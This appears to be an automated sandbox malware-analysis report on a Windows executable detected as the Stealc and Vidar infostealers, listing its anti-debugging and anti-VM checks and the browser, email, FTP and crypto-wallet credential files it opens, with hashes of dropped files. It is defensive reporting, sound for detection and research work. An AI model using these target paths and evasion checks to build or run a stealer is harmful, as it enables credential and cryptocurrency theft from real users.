Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AAKJEGCF.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: AAKJEGCF.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AAKJEGCF.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AAKJEGCF.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AAKJEGCF.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AAKJEGCF.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AAKJEGCF.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AAKJEGCF.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AAKJEGCF.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2365609973.0000000001433000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: AAKJEGCF.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AAKJEGCF.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AAKJEGCF.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AAKJEGCF.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AAKJEGCF.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AAKJEGCF.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AAKJEGCF.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

0_2_6C6B5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005E45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005F9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9750 mov eax, dword ptr fs:[00000030h]

0_2_005F9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6C68B66C

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005F9600

Source: file.exe, file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: PtProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_005F7B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_005F6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_005F7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089686437.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2364033932.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.v

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089686437.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2364033932.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

ID:	1540723
Product:	CloudBasic
Start time:	02:49:07
Start date:	24.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c3296f6f55ac5db62cc43a0f555a1484
SHA1:	ea6b377af194e98a906c8b2373399d3f6f068522
SHA256:	c63fc85a83f56bec43d9cb08cbcf52a14040dc32c628c22c6bea27b95dac15a1
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AAKJEGCF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
C:\ProgramData\BKFBAECBAEGDGDHIEHIJ	ASCII text, with very long lines (1743), with CRLF line terminators	1191AEB8EAFD5B2D5C29DF9B62C45278	584A8B78810AEE6008839EF3F1AC21FD5435B990	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
C:\ProgramData\CAAAFCAKKKFBFIDGDBFHJJEHID	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	9D46F142BBCF25D0D495FF1F3A7609D3	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
C:\ProgramData\FCGIJKJJKEBGHJKFIDGCAAFCAF	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\FIJJKECFCFBGDHIECAAFIIDAKK	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\ProgramData\GCBGCGHD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
